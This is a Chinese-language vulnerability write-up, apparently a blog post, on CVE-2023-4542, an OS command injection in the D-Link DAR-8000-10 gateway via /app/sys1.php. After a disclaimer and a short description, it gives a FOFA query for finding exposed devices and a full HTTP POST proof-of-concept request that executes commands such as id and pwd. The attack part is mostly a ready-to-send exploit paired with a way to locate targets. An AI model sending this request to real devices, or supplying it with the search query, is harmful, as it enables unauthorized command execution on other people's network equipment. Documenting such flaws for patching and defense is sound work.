D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。

任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。

作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

D-Link DAR-8000是中国友讯(D-Link)公司的上网行为审计网关。

D-Link DAR-8000-10版本存在操作系统命令注入漏洞。

漏洞影响

D-Link DAR-8000-10

漏洞危害

该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。

网络测绘

Fofa: body="DAR-8000-10"


漏洞复现

1. 构造poc

vbnet 复制代码
POST /app/sys1.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=id

2. 发送数据包,执行命令

id命令

pwd命令

相关推荐
字节高级特工33 分钟前
网络协议分层与Socket编程详解
linux·服务器·开发语言·网络·c++·人工智能·php
rufeii1 小时前
php-cve篇(CVE-2019-11043&CVE-2012-1823)
开发语言·php
泽济天下4 小时前
【经验分享】JWE 详解:比 JWT 更安全的令牌技术
网络·经验分享·安全
云手机掌柜11 小时前
技术深度解析:指纹云手机如何通过设备指纹隔离技术重塑多账号安全管理
大数据·服务器·安全·智能手机·矩阵·云计算
德迅云安全杨德俊13 小时前
SCDN-保护网站安全的有效方案
网络·安全·web安全·ddos
Aevget15 小时前
PHP智能开发工具PhpStorm v2025.2全新上线——支持PHPUnit 12等
开发语言·ide·php·phpstorm
独行soc17 小时前
2025年渗透测试面试题总结-100(题目+回答)
网络·安全·web安全·网络安全·adb·渗透测试·安全狮
数字化顾问19 小时前
AI自动化测试:接口测试全流程自动化的实现方法——技术深度与行业实践剖析
开发语言·php
Whoami!19 小时前
4-7〔O҉S҉C҉P҉ ◈ 研记〕❘ WEB应用攻击▸文件上传漏洞-B
web安全·网络安全·信息安全·oscp
静渊谋19 小时前
攻防世界-Check
java·安全·网络安全